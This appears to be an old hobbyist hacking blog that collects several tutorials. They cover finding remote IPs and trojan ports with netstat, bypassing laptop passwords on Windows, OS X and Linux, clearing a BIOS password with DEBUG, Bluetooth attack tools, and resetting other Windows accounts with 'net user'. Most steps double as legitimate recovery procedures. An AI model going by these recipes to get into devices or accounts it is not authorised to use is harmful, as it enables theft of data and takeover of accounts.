Well You Can Easily Figure Out The IP Of A Remote System Using The Netstat Utility Available In The Microsoft'S Version Of Dos. The Netstat Command Shows The Connections In Which Your System Is Engaged To And The Ports They Are Using. Suppose You Are Checking Your Mail In Hotmail And You Want To Find Out The IP Of Msn. All You Need To Do Is To Open A Dos Window (Command.Com) And Type Netstat. You Will See All The Open Connections Of Your System. There You Will See Something :

Proto Local Address Foreign Address State

Tcp Raj:1031 64.4.xx.xx:80 Established

Now You Got The IP Address Of Hotmail Ass 64.4.xx.xx .

Similarly You Can Figure Out The IP Address Of Most Http Or Ftp Connections.

To Know Your Own IP Type The Following Command In A Dos Windows

C:\Netstat -N

[This Commands Converts The IP Name Into IP Addresses]

This Is What You Will Probably See On Typing The Above Command :

Proto Local Address Foreign Address State

Tcp 203.xx.251.161:1031 194.1.129.227:21 Established

Tcp 203.xx.251.161:1043 207.138.41.181:80 Fin_Wait_2

Tcp 203.xx.251.161:1053 203.94.243.71:110 Time_Wait

Tcp 203.xx.251.161:1058 194.1.129.227:20 Time_Wait

Tcp 203.xx.251.161:1069 203.94.243.71:110 Time_Wait

Tcp 203.xx.251.161:1071 194.98.93.244:80 Established

Tcp 203.xx.251.161:1078 203.94.243.71:110 Time_Wait



Here 203.xx.251.161 Is Your IP Address.

Now Lets Clarify The Format Used By Netstat :

Proto : It Shows The Type Of Protocol The Connection With The Remote System Is Using.

Here Tcp (Transmission Control Protocol) Is The Protocol Used By My System To Connect To Other Systems.

Local Address :
It Shows The Local Address Ie The Local IP. When The Netstat Command Is Executed Without 'N' Switch Then The Name Of The Local System Is DISPlayed And When The Netstat Is Executed With 'N' Switch Then The IP Of The Local System Is DISPlayed. Here You Can Also Find Out The Port Used By The Connection.

xxx.yyy.zzz.Aaa:1024

In This Format You Will See The Local Address. Here 1024 Is The Port To Which The Remote System Is Connected In Your System



Foreign Address ::

It Shows The IP Address Of The Remote System To Which Your System Is Connected. In This Case Also If The Netstat Command Is Excuted With 'N' Switch Then You Directly Get The IP Of The Victim But If The Netstat Is Executed Without 'N' Switch Then You Will Get The Address Of The Remote System. Something Like



C:\Netstat

Proto Local Address Foreign Address State

Tcp Abhisek:1031 Msgr.Lw4.Gs681.Hotmail.Com:80 Established

Here Msgr.Lw4.Gs681.Hotmail.Com Is The Address Of The Foreign System . Putting This Address In Any IP Look up Program And Doing A Who is Look up Will Reveal The IP Of The Remote System.

Note: The Port To Which Your System Is Connected Can Be Found From This In The Same Way As I Have Shown In The Case Of Local Address. The Difference Is That, This Is The Port Of The Remote System To Which Your Computer Is Connected To.

Below I Have Produced A List Of Ports And Popular Services Generally Found To Be Running.

21 :: Ftp Port

80 :: Http Port

23 :: Telnet Port

Note: If Your Execute The Netstart Command And Find Ports Like 12345,27374 Are Open And Are In Use Then Make It Sure That Your Sweat Heart Computer Is Infected With Her Boyfriend.. J J J J I Mean Your Computer Is Infected With Some Sort Of Trojan.

Below I Have Produced A List Of Commonly Known Trojans And The Ports They Use By Default. So If You Find These Ports Open Then Get A Good Virus Buster And Get These Stupid Servers Of The Trojans Kicked Out. Well If You Want To Play With These Trojan By Keeping Them In Your Computer But Not Letting Them Ruin Your System Performance Then Just Disable It From The System Registry Run And They Wont Be Loaded To Memory Each Time When Windows Starts Up[This Trick Doesn't Work For All Trojans].


Netbus :: 12345(Tcp)

Subseven :: 27374(Tcp)

Girl Friend :: 21554(Tcp)

Back Oriface :: 31337 (Udp)



Well Guys And Gals I Hope You Are Now Well Familiar With The Term IP And What Is The Utility Of IP In Cyber World And How To Get The IP Of A Remote System To Which You Are Connected. I Hope You Find My Writings Very Easy To Understand. I Know I Lack The Capacity Of Explaining Myself But I Try My Level Best To Make Things Very Easy And Clear For You All.

Hacking Password Protected Laptops

Hacking Password Protected Laptops

Password protecting a laptop does not ensure data protection, the password protection of laptops provides a false sense of security. Passwords on laptops are good to implement to prevent unauthorized access, however when a thief steals a laptop and has time, getting around the password is quite simple. There are also issues if there was no way to get around passwords, as even admins forget them and need access to the system. Passwords are good to have, but will not stop a thief from accessing the device, only slow them down a bit. Here is a quick run through of some common techniques for getting around the passwords for different platforms:
Windows XP & Vista

Windows can be cracked using several available tools one popular one is OphCrack which is free. The software can works with Windows, Mac OS X and Linux. It comes with a LiveCD version which automates the retrieval, decryption, and cracking of passwords from a Windows system. The latest version uses a new faster technique using rainbow tables and can crack 99.99% of alphanumeric passwords of up to 14 characters in usually a few seconds, and at most a few minutes. The software works with older versions of Windows as well.

Another commerical product is Proactive Password Auditor from Elcomsoft. The software utilizes similar techniques to OphCrack but with a bit more automation and a friendlier user interface. The product basically makes password a mainstream technique that anyone can use to gain access to a system.
OS X

For OS X 10.4 The root password can be easily reset in OS X by booting the system from the Mac OS X installation CD and selecing the Reset password option under “Utilities” from the installer screen and follow the directions.

OS X 10.5 can be reset using single user mode. (hold down ‘Command’ and ‘S’ during reboot or startup.)

At the prompt, type fsck -fy

Type mount -uw /

Type launchctl load /System/Library/LaunchDaemons/com.apple.DirectoryServices.plist

Type dscl . -passwd /Users/username newpassword replace with the real “username” and follow with the new password, as shown.
Linux

Boot Linux into single-user mode

   1. Reboot the machine.
   2. Press the ESC key while GRUB is loading to enter the menu.
   3. If there is a ‘recovery mode’ option, select it and press ‘b’ to boot into single user mode.
   4. Otherwise, the default boot configuration should be selected. Press ‘e’ to edit it.
   5. Highlight the line that begins with ‘kernel’. Press ‘e’ again to edit this line.
   6. At the end of the line, add an additional parameter: ’single’. Hit return to make the change and press ‘b’ to boot.
   7. Change the admin password
      The system should load into single user mode and you’ll be left at the command line automatically logged in as root. Type ‘passwd’ to change the root password or ‘passwd someuser’ to change the password for your “someuser” admin account.
   8. Reboot
      Enter ‘reboot’ to restart into your machine’s normal configuration.

These are just a few techniques used to get around password protection on laptops. The first thing that should be implemented is making passwords longer, a 14 character password can be cracked in a matter of minutes. Most IT administrators require a password of 8 characters, this is not sufficient. It is better to devise a phrase instead of just a word.
Encryption, Encryption, Encryption

If you have sensitive information on your system, it is important to ensure that the data is encrypted, many operating systems have this built-in and there is also free encryption tools such as TrueCrypt that provide excellent encryption, so even if your password protected laptop is cracked, your data is still secure, just make sure you use a different password for your encrypted drive.

crack the bios password

There are a lot ways to Crack the BIOS password. This is one of them but I would say that this one is more effective than the rest because the rest of the ways does not Guarantee you that it will Crack the BIOS password
while in this case the Cracking is Guaranteed since in this we will remove the functionality of password protection of the BIOS.

Follow the steps below:


1) Boot up windows.
2) go to dos-prompt or go to command prompt directly from the windows start up menu.

3) type the command at the prompt: “debug” (without quotes ninja.gif )
4) type the following lines now exactly as given…….
o 70 10
o 71 20
quit
exit

4) exit from the dos prompt and restart the machine

password protection gone!!!!!!!!!!!!!

Enjoy

PS: I tested this in Award Bios……..
There seems to be some issue regarding display drivers
on some machines if this is used. Just reinstall the drivers, Everything will be fine………..

I have not found any other trouble if the codes are used.

To be on safe side, just back up your data……….

The use of this code is entirely at ur risk……….

It worked fine for me……….

tools for hacking bluetooth enabled devices

Bluetooth technology is great. No doubt. It provides an easy way for a wide range of mobile devices to communicate with each other without the need for cables or wires. However, despite its obvious benefits, it can also be a potential threat for the privacy and security of Bluetooth users (remember Paris Hilton?).

If you are planning to gain a deeper understanding of Bluetooth security, you will need a good set of tools with which to work. By familiarizing yourself with the following tools, you will not only gain a knowledge of the vulnerabilities inherent in Bluetooth-enabled devices, but you will also get a glimpse at how an attacker might exploit them.

This hack highlights the essential tools, mostly for the Linux platform, that can be used to search out and hack Bluetooth-enabled devices.

Discovering Bluetooth Devices

BlueScanner – BlueScanner searches out for Bluetooth-enabled devices. It will try to extract as much information as possible for each newly discovered device. Download BlueScan.

BlueSniff – BlueSniff is a GUI-based utility for finding discoverable and hidden Bluetooth-enabled devices. Download BlueSniff.

BTBrowser – Bluetooth Browser is a J2ME application that can browse and explore the technical specification of surrounding Bluetooth-enabled devices. You can browse device information and all supported profiles and service records of each device. BTBrowser works on phones that supports JSR-82 – the Java Bluetooth specification. Download BTBrowser.

BTCrawler -BTCrawler is a scanner for Windows based devices. It scans for other devices in range and performs service query. It implements the BlueJacking and BlueSnarfing attacks. Download BTCrawler.

Hacking Bluetooth Devices

BlueBugger -BlueBugger exploits the BlueBug vulnerability. BlueBug is the name of a set of Bluetooth security holes found in some Bluetooth-enabled mobile phones. By exploiting those vulnerabilities, one can gain an unauthorized access to the phone-book, calls lists and other private information. Download BlueBugger.

CIHWB – Can I Hack With Bluetooth (CIHWB) is a Bluetooth security auditing framework for Windows Mobile 2005. Currently it only support some Bluetooth exploits and tools like BlueSnarf, BlueJack, and some DoS attacks. Should work on any PocketPC with the Microsoft Bluetooth stack. Download CIHWB.

Bluediving – Bluediving is a Bluetooth penetration testing suite. It implements attacks like Bluebug, BlueSnarf, BlueSnarf++, BlueSmack, has features such as Bluetooth address spoofing, an AT and a RFCOMM socket shell and implements tools like carwhisperer, bss, L2CAP packetgenerator, L2CAP connection resetter, RFCOMM scanner and greenplaque scanning mode. Download Bluediving.

Transient Bluetooth Environment Auditor – T-BEAR is a security-auditing platform for Bluetooth-enabled devices. The platform consists of Bluetooth discovery tools, sniffing tools and various cracking tools. Download T-BEAR.

Bluesnarfer – Bluesnarfer will download the phone-book of any mobile device vulnerable to Bluesnarfing. Bluesnarfing is a serious security flow discovered in several Bluetooth-enabled mobile phones. If a mobile phone is vulnerable, it is possible to connect to the phone without alerting the owner, and gain access to restricted portions of the stored data. Download Bluesnarfer.

BTcrack – BTCrack is a Bluetooth Pass phrase (PIN) cracking tool. BTCrack aims to reconstruct the Passkey and the Link key from captured Pairing exchanges. Download BTcrack.

Blooover II – Blooover II is a J2ME-based auditing tool. It is intended to serve as an auditing tool to check whether a mobile phone is vulnerable. Download Blooover II.

BlueTest – BlueTest is a Perl script designed to do data extraction from vulnerable Bluetooth-enabled devices. Download BlueTest.

BTAudit – BTAudit is a set of programs and scripts for auditing Bluetooth-enabled devices. Download BTAuding.

What’s next? Let everyone know to disable Bluetooth until they really need it. Additionally, make sure to update your phone software
on a regular basis.

HACK ADMIN ACCOUNT

HACK AN ADMINISTRATOR A/C WITHOUT LOGGING IN...
ONLY FOR WINDOWS XP NOT FOR VISTA !!

Here is how...if u r already logged in a computer in an account with Administrative ritesss.....

U can change the pass of any a/c of that computer.. without knowing the original one...

The two methods r here:-

Method 1:

1 press windows+r key..to go to run......
2. type cmd n press enter
3.type net user
this will show all the a/cs on that computer....
4. now type net user acoun_name *
where acoun_name is the name of the a/c u wanna hack..and press enter....
now u will be asked for new password.. just type it.. n press enter.. then again confirm
Ur new password...and press enter... u r done.....

Cheers !!!!!





Hack the admin.. if u r logged innn >>>>>>>>
Method-2

Here is the second method...

1.go to desktop.
2.right click. my computer icon.
3. Go to manage option
4.Go to computer management-system tools-local users and group-users
5. here u will see all the accounts on the computer.
6. right click the account u want to hack and go to set password
7.give your new password.. n u r done...

Cheers !!!!!

Saturday, September 25, 2010

how to became a hacker

This word "HACKER" fascinate , makes us crazy like anything , makes us mad, we are like omg, being a hacker is such great gift to us, we can hack anything, instead everything we can break into everything, we are the most supreme of all no one can stop us.
These are the few thoughts which comes into the mind during the very beginning of the stage, after this stage trust friends more than 90% of the guys leave this thing after knowing the devotion and time this field demands. Guys have live their normal life in day, and in night they live HACKER'S LIFE, this doesn't mean that they sit in some kind of garagae with lots of computer screens , and wires around them , and they sleep their too. loll this is the movie myth, well i wont say guys are not like that , but maximum of hackers are not like what movie depicts them.
Before actually starting the topic i will like to discuss the kind of hackers:
1.Black Hat :
These are the bad guys, who break into company's for money sake.
2.White Hat:
These are the good people who tries to find the security breach in the company and work for the improvement of the security.
3.Grey Hat:
These days, a new breed of hackers are coming into existence called Grey hat hackers, who all are the mixture of black and white hat hackers, these are the hackers who break into other countries network for the country's sake, or due to of patriotic feeling which they have with them.
These guys are not employed by anyone, these are volunteered and self organized group and difficult to find.

Now the first question arises is:

Q1. who is hacker?
The term hacker has been taken in negative way since last decade, actually hackers are supposed to be the geeks or the people who have excellent knowledge of the system, say comp, language like c,c++ etc, who can push that system to new extreme or can define new boundaries for that system, these guys were considered to be good.
But since last decade, hacker is being used as negative word , as a guy who breaks into computer system illegally.
Majority of us are not hackers, we are the people who use the tips and tricks developed by others so we can call ourself crackers , those who dont have much knowledge about the domain but can break into the system. But the problem with the crackers are the with the new advancement of technology, those tips and tricks also stop working, so again they become dependent on Hackers (the real one)

One of my friend said this ...........
guy who discovered the science of 1=1 is a hacker not those who are using it-------------KD.

for those who don't understand the significance of 1=1 ..... it is the basic parameter for checking sqli.

Q2.How to become hacker???????
So by now you guys must have got the clear idea , about what hacker is actually, since hackers are nowadays only referred in computers field.
So, in starting you have to learn the basic languages like C,C++,java,Assembly Lang, after this few scripting language perl,javascript, one or two web designing language php,jsp,asp,html,etc.... few database like oracle,mysql,etc..
when you get the good control over at least 50% of above mentioned material and at least one from each section, then you will understand the working of computer system, how does the computer works, where it can do fault etc... computer is also kind of dumb human, who does only those things which he is told to do, after that its up to your wish, how you can fool the computer.
That is the stage when you will be creating new boundaries and yourself will be breaking it. and at that time you can call yourself A HACKER.